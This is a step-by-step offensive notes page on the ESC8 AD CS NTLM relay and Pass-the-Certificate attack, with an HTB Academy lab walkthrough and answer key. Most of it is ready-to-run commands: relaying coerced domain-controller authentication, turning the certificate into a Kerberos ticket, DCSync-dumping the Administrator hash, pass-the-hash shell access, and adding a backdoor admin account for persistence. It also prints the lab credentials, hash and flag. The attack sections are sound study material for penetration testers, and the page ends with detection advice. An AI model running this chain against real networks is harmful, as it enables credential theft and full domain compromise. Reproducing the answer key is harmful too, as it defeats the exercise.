📜Pass the Certificate (ESC8 & ADCS)

🎯 Overview

Pass the Certificate is an advanced Active Directory attack technique that leverages X.509 certificates to obtain Ticket Granting Tickets (TGTs) and ultimately achieve domain compromise. This attack primarily exploits:

Active Directory Certificate Services (AD CS) vulnerabilities
PKINIT authentication mechanism
Machine account privileges for DCSync
ESC8 NTLM relay attacks against ADCS HTTP endpoints

"Pass-the-Certificate attacks combine ADCS exploitation with Kerberos authentication to achieve domain admin privileges"

🔐 PKINIT Authentication Architecture

Public Key Cryptography for Initial Authentication

PKINIT is an extension of the Kerberos protocol that enables:

X.509 certificate-based authentication
Smart card and certificate logons
Elimination of password-based pre-authentication
Machine account authentication via certificates

Certificate Authentication Flow

Certificate Request → ADCS HTTP Endpoint → Certificate Issuance → PKINIT TGT Request → Domain Controller → TGT with Machine Account Privileges

Attack Prerequisites

ADCS web enrollment enabled (HTTP endpoint accessible)
Valid domain credentials for NTLM relay coercion
Network access to both CA server and Domain Controller
KerberosAuthentication template (or similar machine template)

🎖️ ESC8 - NTLM Relay to ADCS HTTP Endpoint

ESC8 Attack Overview

ESC8 (Escalation 8) is an NTLM relay attack that:

Targets ADCS HTTP web enrollment endpoint
Relays machine account authentication
Obtains machine certificates for domain-joined computers
Bypasses PKI security through relay attack

Attack Architecture

Attacker Machine → NTLM Relay Server → Target Machine → ADCS HTTP Endpoint → Machine Certificate → PKINITtools → TGT → DCSync

🚀 ESC8 Attack Execution

Phase 1: Environment Setup

Required Tools Installation

# Install dependencies (critical for PFX generation)
sudo apt update
sudo apt install python3-cryptography python3-openssl

# Clone attack tools
wget https://raw.githubusercontent.com/dirkjanm/krbrelayx/refs/heads/master/printerbug.py
git clone https://github.com/dirkjanm/PKINITtools.git

Network Reconnaissance

# Identify Domain Controller and Certificate Authority
nmap -p 88,389,636 TARGET_SUBNET
nmap -p 80,443 CA_SERVER

# Verify ADCS HTTP endpoint
curl -k http://CA_SERVER/certsrv/

Phase 2: NTLM Relay Attack Setup

Configure ntlmrelayx Listener

# Target ADCS HTTP endpoint with machine template
sudo impacket-ntlmrelayx -t http://CA_SERVER/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication

# Expected startup output:
# [*] Protocol Client HTTP loaded..
# [*] Running in relay mode to single host
# [*] Setting up SMB Server on port 445
# [*] Servers started, waiting for connections

Phase 3: Authentication Coercion

Printer Bug Exploitation

# Force DC machine account authentication
python3 printerbug.py DOMAIN/username:"password"@DC_IP ATTACKER_IP

# Alternative: PetitPotam (if available)
python3 PetitPotam.py ATTACKER_IP DC_IP -u username -p password

Expected Relay Results

# Successful NTLM relay output:
[*] SMBD-Thread-5: Received connection from DC_IP, attacking target http://CA_SERVER
[*] Authenticating against http://CA_SERVER as DOMAIN/DC01$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 17
[*] Writing PKCS#12 certificate to ./DC01$.pfx
[*] Certificate successfully written to file

🔧 OpenSSL Troubleshooting (Critical)

Common PKCS12 Generation Error

# Frequent error in newer Kali versions:
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

# Complete error context:
[*] GOT CERTIFICATE! ID 17
Exception in thread Thread-6:
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
    p12 = crypto.PKCS12()
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

Package Conflict Issues

# Common Kali package conflicts:
dpkg: error processing archive certipy-ad_5.0.2-0kali1_all.deb (--unpack):
trying to overwrite '/usr/lib/python3/dist-packages/certipy/__init__.py', which is also in package python3-certipy

# Externally-managed-environment errors:
error: externally-managed-environment
× This environment is externally managed

Fix Method 1: Downgrade pyOpenSSL

# Install compatible OpenSSL version
sudo pip3 install pyOpenSSL==22.1.0 --break-system-packages --force-reinstall

# Verify fix
python3 -c "import OpenSSL.crypto; print('PKCS12' in dir(OpenSSL.crypto))"
# Should return: True

Fix Method 2: Ubuntu Package Method (Tested Working)

# Download compatible packages (ARM64 example - adjust for x64)
wget http://ports.ubuntu.com/pool/main/p/python-cryptography/python3-cryptography_41.0.7-4ubuntu0.1_arm64.deb
wget http://launchpadlibrarian.net/715850281/python3-openssl_24.0.0-1_all.deb

# For x64 systems use:
# wget http://launchpadlibrarian.net/732112002/python3-cryptography_41.0.7-4ubuntu0.1_amd64.deb

# Install packages (may show conflicts - ignore)
sudo dpkg -i python3-cryptography_41.0.7-4ubuntu0.1_arm64.deb
sudo dpkg -i python3-openssl_24.0.0-1_all.deb

# Test if fix worked
python3 -c "import OpenSSL.crypto; print('PKCS12' in dir(OpenSSL.crypto))"
# Should return: True

Fix Method 2.5: Force Installation (If dpkg errors)

# If getting dpkg conflicts, force installation
sudo dpkg -i --force-overwrite python3-cryptography_41.0.7-4ubuntu0.1_arm64.deb
sudo dpkg -i --force-overwrite python3-openssl_24.0.0-1_all.deb

Fix Method 3: Virtual Environment

# Create isolated environment
python3 -m venv esc8_env
source esc8_env/bin/activate

# Install specific versions
pip install impacket==0.12.0
pip install pyOpenSSL==22.1.0
pip install cryptography==38.0.4

Common Troubleshooting Scenarios

Port Already in Use Error

# Error: OSError: [Errno 98] Address already in use
# Solution: Kill all existing ntlmrelayx processes
sudo pkill -f ntlmrelayx
sudo killall python3
sudo fuser -k 445/tcp

# Verify ports are free
sudo netstat -tulpn | grep :445

Printerbug RPC Errors

# Error: RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE
# This is NORMAL - the coercion still works even with this error
# The DC will still attempt authentication against your relay

# Alternative coercion if printerbug fails:
# Use PetitPotam or other coercion techniques

ntlmrelayx Hanging on "Getting certificate..."

# If attack hangs after "Getting certificate...", the OpenSSL issue is present
# Certificate was obtained but cannot be saved to PFX format
# Apply one of the OpenSSL fixes above and retry

🎫 PKINITtools Certificate Processing

Environment Setup

# Clone and setup PKINITtools
cd ~ && git clone https://github.com/dirkjanm/PKINITtools.git && cd PKINITtools
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

# Fix oscrypto compatibility
pip3 install -I git+https://github.com/wbond/oscrypto.git

Kerberos Configuration

# Configure /etc/krb5.conf
sudo tee /etc/krb5.conf > /dev/null << EOF
[libdefaults]
    default_realm = DOMAIN.LOCAL

[realms]
    DOMAIN.LOCAL = {
        kdc = DC_IP
    }

[domain_realm]
    .domain.local = DOMAIN.LOCAL
    domain.local = DOMAIN.LOCAL
EOF

# Add DC to hosts file
echo "DC_IP dc01.domain.local" | sudo tee -a /etc/hosts

TGT Generation from Certificate

# Generate TGT using machine certificate
python3 gettgtpkinit.py -cert-pfx DC01\$.pfx -dc-ip DC_IP 'domain.local/dc01$' /tmp/dc.ccache

# Expected output:
# Loading certificate and key from file
# Requesting TGT
# AS-REP encryption key (you might need this later):
# [HEX_KEY]
# Saved TGT to file

# Export TGT for use
export KRB5CCNAME=/tmp/dc.ccache

# Verify ticket
klist

💎 DCSync Attack with Machine Account

Machine Account Privileges

Machine accounts in Active Directory have:

Replication privileges by default
DCSync capability (DRSUAPI access)
High privileges for domain operations
No interactive logon restrictions

Execute DCSync

# DCSync Administrator account
impacket-secretsdump -k -no-pass -dc-ip DC_IP -just-dc-user Administrator 'DOMAIN.LOCAL/DC01$'@DC01.DOMAIN.LOCAL

# Expected output:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:NTHASH:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:AES256_KEY

Full Domain Dump (Optional)

# Extract all domain hashes
impacket-secretsdump -k -no-pass -dc-ip DC_IP -just-dc 'DOMAIN.LOCAL/DC01$'@DC01.DOMAIN.LOCAL

👑 Administrative Access via Pass-the-Hash

Evil-WinRM Connection

# Deactivate venv (system evil-winrm needed)
deactivate

# Connect as Administrator
evil-winrm -i dc01.domain.local -u Administrator -H ADMINISTRATOR_NTHASH

# Expected connection:
Evil-WinRM shell v3.x
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Post-Exploitation

# Verify privileges
whoami /all
net user /domain

# Access sensitive data
type C:\Users\Administrator\Desktop\flag.txt
dir C:\Windows\NTDS\

# Persistence options
net user backdoor Password123! /add
net localgroup administrators backdoor /add

🎯 HTB Academy Lab Walkthrough

Lab Environment

Domain: INLANEFREIGHT.LOCAL
Domain Controller: dc01.inlanefreight.local (10.129.234.174)
Certificate Authority: 10.129.234.172
Credentials: wwhite:package5shores_topher1
Target: Administrator's flag

Step-by-Step Execution

1. ESC8 NTLM Relay Setup

# Terminal 1: Start ntlmrelayx
sudo impacket-ntlmrelayx -t http://10.129.234.172/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication

2. Authentication Coercion

# Terminal 2: Force DC authentication
python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.174 ATTACKER_IP

# Expected result: DC01$.pfx generated

3. PKINITtools Setup

# Setup environment
cd ~/PKINITtools
source .venv/bin/activate

# Generate TGT
python3 gettgtpkinit.py -cert-pfx ../DC01\$.pfx -dc-ip 10.129.234.174 'inlanefreight.local/dc01$' /tmp/dc.ccache

# Export ticket
export KRB5CCNAME=/tmp/dc.ccache

4. DCSync Administrator

# Extract Administrator hash
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL

# Result: Administrator:500:aad3b435b51404eeaad3b435b51404ee:fd02e525dd676fd8ca04e200d265f20c:::

5. Administrator Access

# Connect with hash
evil-winrm -i dc01.inlanefreight.local -u Administrator -H fd02e525dd676fd8ca04e200d265f20c

# Get flag
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\flag.txt
# Result: a1fc497a8433f5a1b4c18274019a2cdb

Validation and Verification

Confirm Certificate Generation

# After ntlmrelayx success, verify PFX file exists
ls -la DC01*.pfx
# Should show: DC01$.pfx with recent timestamp

# Check file size (should be ~2-3KB)
du -h DC01*.pfx

Validate TGT Generation

# After gettgtpkinit.py, confirm ticket cache
ls -la /tmp/dc.ccache

# Verify ticket contents
klist
# Should show: dc01$@INLANEFREIGHT.LOCAL with valid dates

Confirm DCSync Success

# After secretsdump, look for specific output pattern:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:[32-char-hash]:::
# Hash should be exactly 32 characters of hex

# Save hash for later use
echo "fd02e525dd676fd8ca04e200d265f20c" > admin_hash.txt

🛡️ Defense and Detection

Attack Detection

# Event IDs to monitor:
# 4768 - Kerberos TGT Request (unusual machine accounts)
# 4769 - Kerberos Service Ticket Request
# 4624 - Successful Logon (Type 3 - Network)
# 4648 - Logon using explicit credentials

# ADCS specific events:
# Certificate Request Events (4886, 4887)
# Certificate Template Access

Prevention Strategies

# ADCS hardening:
1. Disable HTTP enrollment (use HTTPS only)
2. Implement certificate template restrictions
3. Enable certificate request approval
4. Monitor certificate issuance logs

# Network segmentation:
1. Isolate ADCS servers
2. Implement network access controls
3. Monitor NTLM authentication patterns
4. Block unnecessary RPC protocols

Monitoring Queries

# PowerShell: Detect unusual certificate requests
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4886,4887} | 
Where-Object {$_.Properties[1].Value -like "*DC01*"}

# Splunk: Monitor NTLM relay patterns
index=windows EventCode=4624 Logon_Type=3 | 
stats count by Source_Network_Address, Account_Name | 
where count > 10

💡 Key Takeaways

ADCS is high-value target - Machine certificates = domain admin
OpenSSL compatibility critical - Modern Kali has PKCS12 issues
Machine accounts have DCSync - No privilege escalation needed
NTLM relay still effective - Even in modern environments
Certificate authentication bypasses - Many traditional controls
PKINITtools essential - Converts certificates to Kerberos tickets
Virtual environments solve - Many compatibility issues
HTTPS vs HTTP matters - HTTP ADCS endpoints vulnerable

🔍 Alternative Attack Vectors

Shadow Credentials

# Alternative to ESC8 using pywhisker
python3 pywhisker.py -d DOMAIN.LOCAL -u username -p password --target DC01$ --action add

# Generate TGT with shadow credential
python3 gettgtpkinit.py -cert-pfx USER.pfx -pfx-pass PASSWORD -dc-ip DC_IP DOMAIN.LOCAL/USER /tmp/user.ccache

Other ESC Techniques

# ESC1 - Template misconfiguration
certipy template -u username@domain.local -p password -dc-ip DC_IP

# ESC4 - Template access control
certipy template -u username@domain.local -p password -dc-ip DC_IP -template TEMPLATE_NAME

# ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
certipy req -u username@domain.local -p password -ca CA_NAME -template TEMPLATE -alt administrator@domain.local

🚀 Quick Reference - ESC8 Attack Chain

Complete Attack Commands

# 1. Start ntlmrelayx (Terminal 1)
sudo impacket-ntlmrelayx -t http://CA_SERVER/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication

# 2. Force authentication (Terminal 2)
python3 printerbug.py DOMAIN/user:"password"@DC_IP ATTACKER_IP

# 3. Setup PKINITtools
cd ~/PKINITtools && source .venv/bin/activate

# 4. Generate TGT from certificate
python3 gettgtpkinit.py -cert-pfx DC01\$.pfx -dc-ip DC_IP 'domain.local/dc01$' /tmp/dc.ccache

# 5. Export ticket and DCSync
export KRB5CCNAME=/tmp/dc.ccache
impacket-secretsdump -k -no-pass -dc-ip DC_IP -just-dc-user Administrator 'DOMAIN.LOCAL/DC01$'@DC01.DOMAIN.LOCAL

# 6. Evil-WinRM with Administrator hash
deactivate
evil-winrm -i dc01.domain.local -u Administrator -H ADMIN_HASH

Emergency OpenSSL Fix

# Quick fix for PKCS12 errors
sudo pip3 install pyOpenSSL==22.1.0 --break-system-packages --force-reinstall
python3 -c "import OpenSSL.crypto; print('PKCS12' in dir(OpenSSL.crypto))"

🎯 HTB Academy Answer Key

Attack Type: ESC8 NTLM Relay to ADCS
Certificate Generated: DC01$.pfx (machine certificate)
Administrator Hash: fd02e525dd676fd8ca04e200d265f20c
Final Flag: a1fc497a8433f5a1b4c18274019a2cdb
Critical Fix: pyOpenSSL downgrade to version 22.1.0

PreviousPass the Ticket (PtT) Attacks NextPass the Ticket from Linux

Last updated 5 months ago